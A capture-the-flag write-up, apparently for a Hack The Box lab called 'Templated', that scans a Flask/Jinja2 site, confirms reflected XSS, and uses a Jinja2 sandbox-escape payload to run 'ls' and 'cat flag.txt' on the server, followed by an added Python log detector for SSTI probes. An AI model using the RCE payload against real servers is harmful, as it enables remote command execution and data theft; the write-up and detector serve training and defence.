Templated

http://206.189.121.131:31675/
Site still under construction
Proudly powered by Flask/Jinja2
$ nikto http://206.189.121.131:31675/
+ Server: Werkzeug/1.0.1 Python/3.9.0
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Multiple index files found: /default.htm, /index.php5, /index.pl, /index.php, /index.shtml, /index.do, /index.php3, /index.php7, /default.asp, /index.html, /index.php4, /index.aspx, /index.cgi, /index.jsp, /index.jhtml, /index.asp, /index.cfm, /index.htm, /default.aspx, /index.xml
+ Allowed HTTP Methods: OPTIONS, GET, HEAD 
$ dirb http://206.189.121.131:31675
URL_BASE: http://206.189.121.131:31675/


SSTI - Server Side Template Injection
https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti

Payload: <img src=x onerror="alert('xss')">
http://206.189.121.131:31675/%3Cimg%20src=x%20onerror=%22alert('xss')%22%3E
"xss" popup displayed => the requested path is reflected unescaped into the 404 page

Payloads:
1. {{7*'7'}} => 49 in Twig, 7777777 in Jinja2
http://206.189.121.131:31675/%7B%7B7*'7'%7D%7D
The page '7777777' could not be found => it's Jinja2

2. {{100+100}}
http://206.189.121.131:31675/%7B%7B100+100%7D%7D
Error 404
The page '200' could not be found

3. {{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}
http://206.189.121.131:31675/%7B%7B%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22ls%20*%22).read()%7D%7D

4. {{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}
http://206.189.121.131:31675/%7B%7B%22%22.__class__.__mro__[1].__subclasses__()[186].__init__.__globals__[%22__builtins__%22][%22__import__%22](%22os%22).popen(%22cat%20flag.txt%22).read()%7D%7D
The page 'HTB{t3mpl4t3s_4r3_m0r3_p0w3rfu1_th4n_u_th1nk!} ' could not be found
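From the defender's side, every request above arrives as a URL-encoded path, so a log detector has to decode before matching. The script below is an added example (not part of this writeup): it scans constructed access-log lines modelled on the probes used here and flags template delimiters as a probe and the dunder-attribute walk as an RCE attempt.

```python
"""Detect Jinja2/Twig SSTI probes in web access logs.

Added example (not from the writeup). The probes and the RCE payload are
sent URL-encoded in the request path, so a detector has to decode the path
before matching. The log lines below are constructed, not real traffic.
"""
import re
from urllib.parse import unquote

# Constructed sample lines in common log format (Werkzeug-style requests).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 95
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /%7B%7B7*'7'%7D%7D HTTP/1.1" 404 128
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /%7B%7B100+100%7D%7D HTTP/1.1" 404 120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /%7B%7B%22%22.__class__.__mro__[1].__subclasses__() HTTP/1.1" 404 300
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /about HTTP/1.1" 404 110
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Template delimiters alone indicate a probe such as {{7*'7'}}.
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S)
# Walking Python internals through dunder attributes is the RCE pattern.
SANDBOX_ESCAPE = re.compile(r"__(class|mro|subclasses|globals|builtins|import)__")

def classify_path(raw_path):
    """Return 'rce', 'probe' or None for one request path."""
    # Decode twice: double-encoding is a common way to slip past naive filters.
    path = unquote(unquote(raw_path))
    if SANDBOX_ESCAPE.search(path):
        return "rce"
    if TEMPLATE_DELIMS.search(path):
        return "probe"
    return None

def scan_log(text):
    """Return (line_no, severity, decoded_path) for each suspicious request."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if m:
            sev = classify_path(m.group("path"))
            if sev:
                hits.append((n, sev, unquote(m.group("path"))))
    return hits

if __name__ == "__main__":
    for n, sev, path in scan_log(SAMPLE_LOG):
        print(f"line {n}: {sev:5s} {path}")
```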
